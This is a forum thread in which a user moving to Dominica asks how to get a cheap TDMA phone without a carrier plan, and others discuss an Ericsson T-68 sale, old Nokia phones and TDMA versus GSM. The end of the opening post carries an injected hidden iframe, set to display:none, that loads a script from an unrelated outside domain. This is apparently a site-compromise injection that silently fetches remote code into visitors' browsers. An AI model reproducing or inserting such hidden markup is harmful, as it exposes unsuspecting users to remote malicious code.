+ Reply to Thread

I300 to hand over phone duty to TDMA

I posted before about whether or not my I300 would work on the island of Dominica, which is where I will be moving to for the duration of about 1.5 years. Unfortunately, I have found out that my I300 will not work. I have decided to keep it with me for the palm functions, and will need to acquire a cheap TDMA phone from Nokia (local cellular company called Cable & Wireless says they can convert any Nokia phone to work with their pre-paid cards). However, from my preliminary search for a Nokia TDMA phone, it is my understanding that they can ONLY be had at ridiculously low prices (such as one cent) if you purchase and activate it with a plan (which i do NOT want to do). Is there ANY carrier that will allow me to purchase and KEEP the phone for the low price, activate, and then discontinue service within a month with no penalty and a minimal fee (nothing more than 20-30 bucks) so the phone can be had for just about that much money? Again, I am not interested in the plan, merely the phone. I have asked around if anyone is willing to give up their old phone, but it seems that everyone has Sprint!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Napoleon Bonaparte Jr.

hello

I think , you just mist it .

I boat in Circuit City very cool phone - Eriksson T-68 .

Was sale for one week , only $50 .

In Circuit City you do not have to activate the phone with ATT .

I think , you can Unlock in your contry , its cheaper then here .

In Russia , to Unlock the phone cost only $10 .

And in Russia Eriksson T-68 still around $300 .

damn! i missed the deal...i checked this time around and there doesnt seem to be anything special. were there rebates for the 50 dollar offer that will only be sent if you activated the phone on their service, or was the phone naturally priced at 50 dollars out the door? for some reason, the wireless company said we could purchase phones from the US and then bring them with us for our stay there, and they would convert them. They made no mention of any other brands which they could "convert." I believe they try to sell you their Nokia 6160 for 350 bucks otherwise.

Ericson

I think I have an OLD TDMA phone around, but it is an Ericcson. Will that help you? Keep in mind, the operative word is OLD. (circa 1999 or so).
    Carl

I will find out if the ericson can be used, and will email/pm you back...thanks.

Administrator

Arrow

ive got an old nokia 6100 series phone.. its the small one with the IR port at the top.. it was on bellsouth mobility (home of the Simon)...

The Ericson phones mentioned are strictly GSM and not TDMA. You are pretty much going to have to stick with the cheap Nokia phones, and just accept the fact that you won't get data while you are there.

As TDMA is an older technology without a real migration path, manufacturers aren't really making cool TDMA phones. The "coolest" TDMA phones that you can get are the Nokia and the Motorola Startac, both of which were the peak of cool back around 1995.

The Ericcson phone I have is TDMA not GSM. It was/is an AT&T phone and ran on AT&Ts TDMA network here in Atlanta.
    Carl